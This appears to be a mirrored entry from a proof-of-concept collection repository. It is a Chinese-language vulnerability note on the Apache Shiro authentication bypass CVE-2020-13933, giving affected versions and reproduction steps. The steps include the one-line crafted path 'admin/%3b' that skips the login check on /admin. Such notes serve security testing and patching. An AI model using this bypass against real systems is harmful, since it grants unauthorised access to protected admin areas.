admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 11:27:43 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web服务器漏洞/Apache Shiro 1.6.0 身份认证绕过漏洞 CVE-2020-13933.md
Threekiii 61a7f98a40 更新漏洞
2023-07-25 17:19:35 +08:00

562 B
Raw Blame History

Apache Shiro 1.6.0 身份认证绕过漏洞 CVE-2020-13933

漏洞描述

2020年8月18日Apache Shiro官方发布安全通告 Apache Shiro身份验证绕过漏洞CVE-2020-13933经过分析攻击者可以通过构造特殊的HTTP请求实现身份验证绕过。

漏洞影响

Apache Shiro < 1.6.0

漏洞复现

正常访问 /admin需要登录

image-20230724162154509

构造恶意请求绕过:

admin/%3b

image-20230724162320484